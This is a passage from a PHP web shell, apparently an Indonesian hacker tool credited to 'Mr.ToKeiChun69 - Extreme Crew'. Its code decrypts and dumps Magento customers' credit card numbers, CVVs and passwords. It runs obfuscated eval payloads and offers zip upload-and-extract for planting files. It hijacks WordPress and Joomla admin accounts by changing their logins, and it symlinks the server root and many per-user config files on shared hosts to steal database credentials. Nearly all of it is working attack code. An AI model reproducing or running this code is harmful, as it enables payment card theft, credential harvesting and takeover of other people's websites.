  756. $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''");
  757. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){
  758. echo'<br><br>
  759. ====================================================================<br>
  760. [ Credit Card ] <br>
  761. ====================================================================<br>';
  762. echo "
  763. <table border='1' align='left' >
  764. <tr>
  765. <td>no</td>
  766. <td>Date</td>
  767. <td>Credit Owner</td>
  768. <td>method</td>
  769. <td>Credit Number</td>
  770. <td>Credit Exp</td>
  771. <td>CVV</td>
  772. <td>Address</td>
  773. </tr>";
  774. $no = 1;
  775. $batas = 0;
  776. while($vx = mysql_fetch_array($query)){
  777. $date = $vx['updated_at'];
  778. $cc_owner = $vx['cc_owner'];
  779. $method = $vx['method'];
  780. $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']);
  781. $exp = $vx['exp'];
  782. $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']);
  783. $Billing_Address = $vx['Billing Address'];
  784. echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>";
  785. $batas = $no++;
  786. }
  787.  
  788. while($vx2 = mysql_fetch_array($query2)){
  789. $batas +=1;
  790. $cc_owner = $vx2['cc_owner'];
  791. $method = $vx2['method'];
  792. $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']);
  793. $exp = $vx2['exp'];
  794. $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']);
  795. $Billing_Address = $vx2['Billing Address'];
  796. echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>";
  797. $batas++;
  798. }
  799.  
  800. echo "</table><br>";
  801. }
  802. //=========================================================================================================
  803. $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12");
  804. $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote");
  805.  
  806.  
  807. if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){
  808. if (!$query){
  809. echo "<center><b>Gagal</b></center>";
  810. }else{
  811. echo'<br><br>
  812. ====================================================================<br>
  813. [ Customer ] <br>
  814. ====================================================================<br>';
  815. }
  816. echo "
  817. <table border='1' align='center' >
  818. <tr>
  819. <td>no</td>
  820. <td>user</td>
  821. <td>pass</td>
  822. </tr>";
  823. $no = 1;
  824. $batas = 0;
  825. while($vx = mysql_fetch_array($query)) {
  826. $user = $vx['email'];
  827. $pass = $vx['value'];
  828. echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>";
  829. $batas = $no++;
  830. }
  831.  
  832. if(mysql_num_rows($query2) != 0 && ($query2)){
  833. while($vx2 = mysql_fetch_array($query2)){
  834. $user = $vx2['customer_email'];
  835. $pass = $crypto->decrypt($vx2['password_hash']);
  836. if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin
  837. $batas +=1;
  838. echo "<tr><pre><td>$batas</td><td>$user</td><td>$pass</td></pre></tr>";
  839. $batas++;
  840. }
  841. }
  842. }
  843.  
  844. echo "</table><br>";
  845. }
  846. //=========================================================================================================
  847. }
  848. }
  849. function save($format,$data){
  850. $fp = fopen($format, 'a');
  851. fwrite($fp, $data);
  852. fclose($fp);
  853. }
  854. function cekbase64($string){
  855. $decoded = base64_decode($string, true);
  856. if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false;
  857. if(!base64_decode($string, true)) return false;
  858. if(base64_encode($decoded) != $string) return false;
  859. return true;//nilai return 1 jika true
  860. }
  861. //----untuk decode password ---/
  862. class Varien_Crypt_Mcrypt{
  863. /**
  864. * Constuctor
  865. *
  866. * @param array $data
  867. */
  868. public function __construct()
  869. {
  870. }
  871.  
  872. /**
  873. * Initialize mcrypt module
  874. *
  875. * @param string $key cipher private key
  876. * @return Varien_Crypt_Mcrypt
  877. */
  878. public function init($key)
  879. {
  880. $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, '');
  881. $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND);
  882. $maxKeySize = mcrypt_enc_get_key_size($this->handler);
  883.  
  884. if (iconv_strlen($key, 'UTF-8')>$maxKeySize) {
  885. //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize);
  886. return null;
  887. }
  888.  
  889. mcrypt_generic_init($this->handler, $key, $iv);
  890.  
  891. return $this;
  892. }
  893.  
  894. /**
  895. * Encrypt data
  896. *
  897. * @param string $data source string
  898. * @return string
  899. */
  900. public function encrypt($data)
  901. {
  902. if (!$this->handler) {
  903. //throw new Varien_Exception('Crypt module is not initialized.');
  904. return null;
  905. }
  906. if (strlen($data) == 0) {
  907. return $data;
  908. }
  909. return base64_encode(mcrypt_generic($this->handler, $data));
  910. }
  911.  
  912. /**
  913. * Decrypt data
  914. *
  915. * @param string $data encrypted string
  916. * @return string
  917. */
  918. public function decrypt($data)
  919. {
  920. if (!$this->handler) {
  921. //throw new Varien_Exception('Crypt module is not initialized.');
  922. return null;
  923. }
  924. if (strlen($data) == 0) {
  925. return $data;
  926. }
  927. return mdecrypt_generic($this->handler, base64_decode($data));
  928. }
  929.  
  930.  
  931. /**
  932. * Desctruct cipher module
  933. *
  934. */
  935. public function __destruct()
  936. {
  937. if ($this->handler) {
  938. $this->_reset();
  939. }
  940. }
  941.  
  942. protected function _reset()
  943. {
  944. mcrypt_generic_deinit($this->handler);
  945. mcrypt_module_close($this->handler);
  946. }
  947. }
  948. }
  949. elseif($_GET['do'] == 'zip') {
  950. echo "<center><h1>Zip Menu</h1>";
  951. function rmdir_recursive($dir) {
  952. foreach(scandir($dir) as $file) {
  953. if ('.' === $file || '..' === $file) continue;
  954. if (is_dir("$dir/$file")) rmdir_recursive("$dir/$file");
  955. else unlink("$dir/$file");
  956. }
  957. rmdir($dir);
  958. }
  959. if($_FILES["zip_file"]["name"]) {
  960. $filename = $_FILES["zip_file"]["name"];
  961. $source = $_FILES["zip_file"]["tmp_name"];
  962. $type = $_FILES["zip_file"]["type"];
  963. $name = explode(".", $filename);
  964. $accepted_types = array('application/zip', 'application/x-zip-compressed', 'multipart/x-zip', 'application/x-compressed');
  965. foreach($accepted_types as $mime_type) {
  966. if($mime_type == $type) {
  967. $okay = true;
  968. break;
  969. }
  970. }
  971. $continue = strtolower($name[1]) == 'zip' ? true : false;
  972. if(!$continue) {
  973. $message = "Itu Bukan Zip , , GOBLOK COK";
  974. }
  975. $path = dirname(__FILE__).'/';
  976. $filenoext = basename ($filename, '.zip');
  977. $filenoext = basename ($filenoext, '.ZIP');
  978. $targetdir = $path . $filenoext;
  979. $targetzip = $path . $filename;
  980. if (is_dir($targetdir)) rmdir_recursive ( $targetdir);
  981. mkdir($targetdir, 0777);
  982. if(move_uploaded_file($source, $targetzip)) {
  983. $zip = new ZipArchive();
  984. $x = $zip->open($targetzip);
  985. if ($x === true) {
  986. $zip->extractTo($targetdir);
  987. $zip->close();
  988.  
  989. unlink($targetzip);
  990. }
  991. $message = "<b>Sukses Gan :)</b>";
  992. } else {
  993. $message = "<b>Error Gan :(</b>";
  994. }
  995. }
  996. echo '<table style="width:100%" border="1">
  997. <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
  998. <label>Zip File : <input type="file" name="zip_file" /></label>
  999. <input type="submit" name="submit" value="Upload And Unzip" />
  1000. </form>';
  1001. if($message) echo "<p>$message</p>";
  1002. echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/chonx_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";
  1003. if($_POST['backup']){
  1004. $save=$_POST['save'];
  1005. function Zip($source, $destination)
  1006. {
  1007. if (extension_loaded('zip') === true)
  1008. {
  1009. if (file_exists($source) === true)
  1010. {
  1011. $zip = new ZipArchive();
  1012.  
  1013. if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
  1014. {
  1015. $source = realpath($source);
  1016.  
  1017. if (is_dir($source) === true)
  1018. {
  1019. $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
  1020.  
  1021. foreach ($files as $file)
  1022. {
  1023. $file = realpath($file);
  1024.  
  1025. if (is_dir($file) === true)
  1026. {
  1027. $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
  1028. }
  1029.  
  1030. else if (is_file($file) === true)
  1031. {
  1032. $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
  1033. }
  1034. }
  1035. }
  1036.  
  1037. else if (is_file($source) === true)
  1038. {
  1039. $zip->addFromString(basename($source), file_get_contents($source));
  1040. }
  1041. }
  1042.  
  1043. return $zip->close();
  1044. }
  1045. }
  1046.  
  1047. return false;
  1048. }
  1049. Zip($_POST['dir'],$save);
  1050. echo "Done , Save To <b>$save</b>";
  1051. }
  1052. echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/chonx_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
  1053. if($_POST['extrak']){
  1054. $save=$_POST['save'];
  1055. $zip = new ZipArchive;
  1056. $res = $zip->open($_POST['dir']);
  1057. if ($res === TRUE) {
  1058. $zip->extractTo($save);
  1059. $zip->close();
  1060. echo 'Succes , Location : <b>'.$save.'</b>';
  1061. } else {
  1062. echo 'Gagal Mas :( Ntahlah !';
  1063. }
  1064. }
  1065. echo '</tr></table>';
  1066. }
  1067. elseif($_GET['do'] == 'shellchk') {
  1068. eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH1epf4HcCE1VUxbNvEwdSMGd9FeJtGhPaygyLZ5B6jc5AaHORP/fdf5IoXxsBeiSbGdZu491z6+cTiA1GVPdCkwDTIaDnM5lyVupoT5Nc1ymWWmWpZdRm9FXWOGqzguTlue4Utjpa+p53a411OCIcKZFCxqGVUES63F8XGSylAx3jr+oATX45SXE3LBubGwAsM16RLpY5Jlp+aHh1RR8jscWaPZpI0dzbay/hdZJJqkziiFUZV5t5ohSmIE1POy0M+Bl+381rjEL1whj5xmh/kwvC85oifDTp6wqlXyADr2ynAJKJgpiEaeTrCvLaDIA/J0OCD47FswS6Yi85pEzzrYVoNF2ujEg0OX0jJ1duvpWlW+hORmhxQIElNvPuS/inBksxEA98JsNaPjRIiU9civj2FpYL5jhElwWdN8KmUSZ3fm5NNn2pVFMWILSHUuPTFerhbfSYs1Xax+nV2s4u+Xl4slegNI6MckWBxvdmiUx6SRWHUftOXZ5jWmD/Gi9qAUbdMVvKPKP6elKVxA1QayIrWnG3A59y6ibiMjrDMd9OI+9UfcyU9QsvB3W5VwT4eDHam5xc85F8ACd40q3EvfeMxADe3HzatgAcLD58AhwYNoyOxJDvqc5pYhhrOHCO8Y097nXM6vJACLfvCEct6IWaMfGxj5VXOGSwk5Opai4J5n72gj0Wfza+sM+x29+D6bR5eFWaK2xCcCQcELBxy9Y8DbOjFY2nF26JjF88lC3zmYZHEJ8hYkTFaJFtp7j3dpzPvfdKxZKYx9j1CWkFJfuSbvZMzDAf78MRdXgQ724/Oz5cVtR7dA7BK95oW9TvX6id8rrLYhYIaupzSEqntthpHSeYK2aXmfYEWLxqojGkjH3mRJcryqge1uN6CvYvgbLZdJJPqPi928ml2vNqHd+yU4Q6botthiDsI//AU='))))));
  1069. } elseif($_GET['do'] == 'loghunter')
  1070. {eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));}
  1071. elseif($_GET['do'] == 'metu') {
  1072.  
  1073.  
  1074. echo '<form action="?dir=$dir&do=metu" method="post">';
  1075. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  1076. echo 'Byee !';
  1077.  
  1078. }
  1079. elseif($_GET['do'] == 'about') {
  1080.  
  1081. echo '<center>By Mr.ToKeiChun69 - Extreme Crew';
  1082.  
  1083. }
  1084. elseif($_GET['do'] == 'auto_cu_wp') {
  1085. if($_POST['gass']) {
  1086. echo "<center><h1>WordPress Auto Change User 2</h1>
  1087. <form method='post'>
  1088. Link Config: <br>
  1089. <textarea name='link' style='width: 450px; height:250px;'>";
  1090. UrlLoop($_POST['linkconf'],'wordpress');
  1091. echo"</textarea><br>
  1092. <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Hajar!!'>
  1093. </form></center>";
  1094. } else {
  1095. echo "<center><h1>WordPress Auto Change User 2</h1>
  1096. <form method='post'>
  1097. Link Config: <br>
  1098. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/viewsymcnf/'><br>
  1099. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1100. </form></center>";
  1101. }
  1102. if($_POST['auto_cu_wp']) {
  1103.  
  1104. function anucurl($sites) {
  1105. $ch = curl_init($sites);
  1106. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1107. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1108. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1109. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1110. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1111. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1112. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1113. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1114. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1115. $data = curl_exec($ch);
  1116. curl_close($ch);
  1117. return $data;
  1118. }
  1119. $link = explode("\r\n", $_POST['link']);
  1120. $user = "faisa69";
  1121. $pass = "faisa69";
  1122. $passx = md5($pass);
  1123. foreach($link as $dir_config) {
  1124. $config = anucurl($dir_config);
  1125. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1126. $dbuser = ambilkata($config,"DB_USER', '","'");
  1127. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1128. $dbname = ambilkata($config,"DB_NAME', '","'");
  1129. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1130. $prefix = $dbprefix."users";
  1131. $option = $dbprefix."options";
  1132. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1133. $db = mysql_select_db($dbname);
  1134. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1135. $result = mysql_fetch_array($q);
  1136. $id = $result[ID];
  1137. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1138. $result2 = mysql_fetch_array($q2);
  1139. $target = $result2[option_value];
  1140. if($target == '') {
  1141. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1142. } else {
  1143. echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
  1144. }
  1145. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1146. if(!$conn OR !$db OR !$update) {
  1147. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1148. mysql_close($conn);
  1149. } else {
  1150. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1151. echo "[+] username: <font color=lime>$user</font><br>";
  1152. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1153.  
  1154. mysql_close($conn);
  1155. }
  1156. }
  1157. }
  1158.  
  1159. }
  1160. elseif($_GET['do'] == 'auto_cu_joomla') {
  1161. if($_POST['gass']) {
  1162. echo "<center><h1>Joomla Auto Change User 2</h1>
  1163. <form method='post'>
  1164. Link Config: <br>
  1165. <textarea name='link' style='width: 450px; height:250px;'>";
  1166. UrlLoop($_POST['linkconf'],'joomla');
  1167. echo"</textarea><br>
  1168. <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Hajar!!'>
  1169. </form></center>";
  1170. } else {
  1171. echo "<center><h1>Joomla Auto Change User 2</h1>
  1172. <form method='post'>
  1173. Link Config: <br>
  1174. <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/viewsymcnf/'><br>
  1175. <input type='submit' style='width: 450px;' name='gass' value='Hajar!!'>
  1176. </form></center>";
  1177. }
  1178. if($_POST['auto_cu_joomla']) {
  1179.  
  1180. function anucurl($sites) {
  1181. $ch = curl_init($sites);
  1182. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1183. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1184. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1185. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1186. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1187. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1188. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1189. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1190. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1191. $data = curl_exec($ch);
  1192. curl_close($ch);
  1193. return $data;
  1194. }
  1195. $link = explode("\r\n", $_POST['link']);
  1196. $user = "faisa69";
  1197. $pass = "faisa69";
  1198. $passx = md5($pass);
  1199. foreach($link as $dir_config) {
  1200. $config = anucurl($dir_config);
  1201. $dbhost = ambilkata($config,"host = '","'");
  1202. $dbuser = ambilkata($config,"user = '","'");
  1203. $dbpass = ambilkata($config,"password = '","'");
  1204. $dbname = ambilkata($config,"db = '","'");
  1205. $dbprefix = ambilkata($config,"dbprefix = '","'");
  1206. $prefix = $dbprefix."users";
  1207. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1208. $db = mysql_select_db($dbname);
  1209. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1210. $result = mysql_fetch_array($q);
  1211. $id = $result['id'];
  1212. $site = ambilkata($config,"sitename = '","'");
  1213. $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
  1214. echo "Config => ".$dir_config."<br>";
  1215. echo "CMS => Joomla<br>";
  1216. if($site == '') {
  1217. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1218. } else {
  1219. echo "Sitename => $site<br>";
  1220. }
  1221. if(!$update OR !$conn OR !$db) {
  1222. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1223. } else {
  1224. echo "Status => Done , Username : <font color=lime>$user</font> Password : <font color=lime>$pass</font><br><br>";
  1225. }
  1226. mysql_close($conn);
  1227. }
  1228. }
  1229. }
  1230. elseif($_GET['do'] == 'symconfig') {
  1231. if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
  1232. echo '<script>alert("Skid this won\'t work on Windows")</script>';
  1233. exit;
  1234. }
  1235. else
  1236. {
  1237. if($_POST["m"] && !$_POST["passwd"]==""){
  1238. @mkdir("viewsymcnf", 0777);
  1239. @chdir("viewsymcnf");
  1240. @symlink("/","root");
  1241. $htaccess="Options Indexes FollowSymLinks
  1242. DirectoryIndex janchonx.htm
  1243. AddType text/plain .php
  1244. AddHandler text/plain .php
  1245. Satisfy Any";
  1246. @file_put_contents(".htaccess",$htaccess);
  1247. $etc_passwd=$_POST["passwd"];
  1248. $etc_passwd=explode("\n",$etc_passwd);
  1249. foreach($etc_passwd as $passwd){
  1250. $pawd=explode(":",$passwd);
  1251. $user =$pawd[0];
  1252.  
  1253. @symlink('/','viewsymcnf/root');
  1254. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1255. @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1256. @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1257. @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1258. @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1259. @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1260. @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1261. @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1262. @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1263. @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1264. @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1265. @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1266. @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1267. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1268. @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1269. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1270. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1271. @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1272. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1273. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1274. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1275. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1276. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1277. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1278. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1279. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1280. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1281. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1282. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1283. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1284. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1285. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1286. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1287. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1288. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1289. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1290. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1291. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1292. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1293. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1294. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1295. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1296. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1297. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1298. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1299. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1300. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1301. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1302. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1303. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1304. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1305. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1306. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1307. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1308. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1309. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1310. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1311. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1312. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1313. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1314. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1315. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1316. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1317. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1318. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1319. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1320. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1321. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
